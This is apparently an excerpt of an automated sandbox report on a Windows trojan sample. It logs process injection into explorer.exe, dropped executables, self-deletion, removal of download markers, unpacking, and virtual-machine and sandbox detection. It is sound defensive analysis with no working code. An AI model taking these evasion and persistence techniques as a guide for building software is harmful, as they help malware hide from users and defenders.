          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004DBC5A8_2_004DBC5A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004A8C0C8_2_004A8C0C
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004013D8
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401407 NtAllocateVirtualMemory,1_2_00401407
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014DA
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014DD
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004013E3 NtAllocateVirtualMemory,1_2_004013E3
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004013F6 NtAllocateVirtualMemory,1_2_004013F6
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004013FE NtAllocateVirtualMemory,1_2_004013FE
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014A8
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014B3
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014BF
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004013D8
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_00401407 NtAllocateVirtualMemory,5_2_00401407
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014DA
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014DD
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004013E3 NtAllocateVirtualMemory,5_2_004013E3
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004013F6 NtAllocateVirtualMemory,5_2_004013F6
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004013FE NtAllocateVirtualMemory,5_2_004013FE
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014A8
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014B3
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014BF
          Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp 6ECC725EAB418E27D8FA2F1031FCE6BC119D677B8D72E0447050A87489E8E0CA
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\cgjtubb C:\Users\user\AppData\Roaming\cgjtubb
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FD31.exe C:\Users\user\AppData\Local\Temp\FD31.exe
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp",Tiuqiiueaur
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2B26.exe C:\Users\user\AppData\Local\Temp\2B26.exe
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\2B26.exe "C:\Users\user\AppData\Local\Temp\2B26.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\cgjtubb C:\Users\user\AppData\Roaming\cgjtubb
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FD31.exe C:\Users\user\AppData\Local\Temp\FD31.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2B26.exe C:\Users\user\AppData\Local\Temp\2B26.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp",TiuqiiueaurJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cgjtubbJump to behavior
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FD31.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@10/5@35/10
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00714147 CreateToolhelp32Snapshot,Module32First,1_2_00714147
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp",Tiuqiiueaur
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeMutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: PC:\wekeledo-cilebac.pdb0_ source: file.exe, cgjtubb.4.dr
          Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 2B26.exe, 0000000A.00000002.473602771.0000000000410000.00000040.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000002.494160010.0000000000410000.00000040.00000001.01000000.0000000A.sdmp
          Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 2B26.exe, 0000000F.00000002.495056481.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.501354011.0000000002A88000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\tipalowi\48\cibo\rorijagumew\veh\jixanuwud42_goku.pdb source: 2B26.exe, 0000000A.00000000.460526248.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000000.473105275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe.4.dr
          Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 2B26.exe, 0000000F.00000002.495056481.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.501354011.0000000002A88000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\hicimusafaye.pdb source: FD31.exe, 00000008.00000000.428535544.0000000000401000.00000020.00000001.01000000.00000008.sdmp, FD31.exe.4.dr
          Source: Binary string: C:\wekeledo-cilebac.pdb source: file.exe, cgjtubb.4.dr
          Source: Binary string: TC:\hicimusafaye.pdb0_ source: FD31.exe, 00000008.00000000.428535544.0000000000401000.00000020.00000001.01000000.00000008.sdmp, FD31.exe.4.dr
          Source: Binary string: C:\tipalowi\48\cibo\rorijagumew\veh\jixanuwud42_goku.pdb0_ source: 2B26.exe, 0000000A.00000000.460526248.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000000.473105275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe.4.dr

          Data Obfuscation

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeUnpacked PE file: 8.2.FD31.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 10.2.2B26.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 15.2.2B26.exe.400000.0.unpack
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\AppData\Roaming\cgjtubbUnpacked PE file: 5.2.cgjtubb.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeUnpacked PE file: 8.2.FD31.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 10.2.2B26.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 15.2.2B26.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\user\AppData\Roaming\cgjtubbUnpacked PE file: 17.2.cgjtubb.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402F47 push eax; ret 1_2_00402F82
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402F7D push eax; ret 1_2_00402F82
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402183 push ecx; iretd 1_2_004024FA
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0071540B push 75A06D18h; ret 1_2_0071541A
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007153FB push 75A06D18h; ret 1_2_0071541A
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007163FD push eax; ret 1_2_00716402
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00715BAA push ecx; iretd 1_2_00715BB4
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_00402F47 push eax; ret 5_2_00402F82
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_00402F7D push eax; ret 5_2_00402F82
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_00402183 push ecx; iretd 5_2_004024FA
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_005040BC push 004D27D6h; ret 8_2_0050438C
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B1464 push 004650DCh; ret 8_2_004B1655
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004E2862 push 0046776Dh; ret 8_2_004E28FB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00503978 push 004B2172h; ret 8_2_00503CA0
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B298D push 004ADFCCh; ret 8_2_004B2C1D
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00469A47 push 00467687h; ret 8_2_00469AF1
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C4B8D push dword ptr [005093A7h]; ret 8_2_004C4BAF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0046DEF0 push 00464E9Eh; ret 8_2_0046DFAB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00469F68 push 00464241h; ret 8_2_0046A0A1
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00502051 push 004B85ABh; ret 8_2_00502198
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004DD04E push 004B534Eh; ret 8_2_004DD1EC
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048204C push 0046776Dh; ret 8_2_004821F2
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004FE04B push 004ED4E2h; ret 8_2_004FE065
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004CE047 push 004668D8h; ret 8_2_004CE082
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D3042 push 004BE12Ch; ret 8_2_004D310E
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0050405F push 004BECDFh; ret 8_2_005040BB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D605F push 004C1383h; ret 8_2_004D61CF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D605F push 004ACE34h; ret 8_2_004DAC74
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EC055 push 004BB3D7h; ret 8_2_004EC0B4
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C9028 push 004BB3D7h; ret 8_2_004C91CD
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00470064 push 0046426Ah; ret 8_2_00470399
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cgjtubbJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cgjtubbJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FD31.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2B26.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeFile created: C:\Users\user\AppData\Local\Temp\Wuwedteata.tmpJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Deletes itself after installation
          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\cgjtubb:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: file.exe, 00000001.00000002.378045124.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
          Checks if the current machine is a virtual machine (disk enumeration)
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Windows\explorer.exe TID: 5812Thread sleep count: 665 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5804Thread sleep count: 967 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5804Thread sleep time: -96700s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5808Thread sleep count: 1080 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5808Thread sleep time: -108000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1180Thread sleep count: 576 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3676Thread sleep count: 928 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3676Thread sleep time: -92800s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 964Thread sleep count: 897 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 964Thread sleep time: -89700s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3832Thread sleep count: 461 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3092Thread sleep count: 496 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3092Thread sleep time: -49600s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\2B26.exe TID: 1900Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 665Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 967Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1080Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 576Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 928Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 897Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 461Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 496Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeFile opened: PHYSICALDRIVE0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeAPI coverage: 8.4 %
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 136000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: explorer.exe, 00000004.00000000.328230756.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000000.351077876.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.369699958.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000000.329519607.0000000008494000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}asses\Drive\shellex\FolderEBj!
          Source: explorer.exe, 00000004.00000000.328518431.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.332169863.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
